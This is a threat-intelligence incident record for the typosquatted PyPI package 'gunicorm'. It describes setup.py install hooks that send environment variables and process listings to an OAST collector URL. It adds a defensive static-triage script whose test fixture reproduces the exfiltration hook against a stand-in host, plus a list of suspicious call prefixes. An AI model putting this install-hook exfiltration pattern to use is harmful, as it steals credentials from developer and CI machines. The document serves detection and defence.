Supply-chain threat intelligence

Incident detail

critical · pypi · typosquatting · osv

Malicious code in gunicorm (PyPI)

gunicorm

Risk score

92

AI summary

Indexed incident for gunicorm (pypi).

Description

The package name gunicorm is a single-character edit of the widely used gunicorn WSGI server, and the package ships no functional code beyond setup.py. setup.py registers custom install and egg_info cmdclasses so that, on pip install or pip download, the package captures the full os.environ and the output of ps -elf, then POSTs the combined data via curl to http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun (an interactsh OAST collector). Environment variables on developer and CI machines routinely contain AWS keys, registry tokens, and other credentials, all of which are exfiltrated unconditionally to an attacker-controlled endpoint over plain HTTP. The README self-describes the package as a proof-of-concept that runs a command on pip download/install. There is no legitimate functionality.
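As an added defensive check (not part of this incident record or of any package's code), the script below statically triages a setup.py for the pattern described above: cmdclass overrides of install-time hooks combined with environment capture, process listing or outbound network calls. The setup.py fixture and the collector.invalid host are constructed for illustration and the fixture is only parsed, never executed.

```python
import ast

# setuptools hooks that run on `pip install` / `pip download`; overriding them via cmdclass is the vector used here
HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}
# name prefixes indicating environment capture, process listing or outbound I/O
SUSPICIOUS_PREFIXES = ("os.environ", "os.system", "os.popen", "subprocess",
                       "urllib", "requests", "socket", "http.client")

def _dotted(node):
    # flatten a Name/Attribute chain (os.environ.copy -> "os.environ.copy")
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(node.id)
    return ".".join(reversed(parts))

def triage_setup_py(source):
    """Static triage of a setup.py: which hooks are overridden and what the module touches."""
    overrides, suspicious = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted(node.func).endswith("setup"):
            for kw in node.keywords:          # cmdclass={"install": Hook, ...}
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in HOOKED_COMMANDS:
                            overrides.add(key.value)
        elif isinstance(node, (ast.Attribute, ast.Name)):
            name = _dotted(node)
            if name.startswith(SUSPICIOUS_PREFIXES):
                suspicious.add(name)
    # a hooked command plus env/process/network access is the combination to escalate
    return {"overrides": overrides, "suspicious": suspicious,
            "flagged": bool(overrides) and bool(suspicious)}

# constructed fixture mirroring the described pattern (not the real package's code); collector.invalid cannot resolve
FLAGGED_SETUP_PY = '''
import os, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install
class Hook(install):
    def run(self):
        data = dict(os.environ)
        data["ps"] = subprocess.check_output(["ps", "-elf"])
        urllib.request.urlopen("http://collector.invalid/", data=repr(data).encode())
setup(name="gunicorm", version="0.0.1", cmdclass={"install": Hook, "egg_info": Hook})
'''
CLEAN_SETUP_PY = 'from setuptools import setup\nsetup(name="demo", version="1.0")\n'
```

Run it over every setup.py in a dependency download directory before installation; a flagged result is a reason to hold the package for manual review, not proof on its own.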

During installation, the package exfiltrates environment variables.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting

Technical details

Affected versions

=0.0.1

Indicators

  • affected version=0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents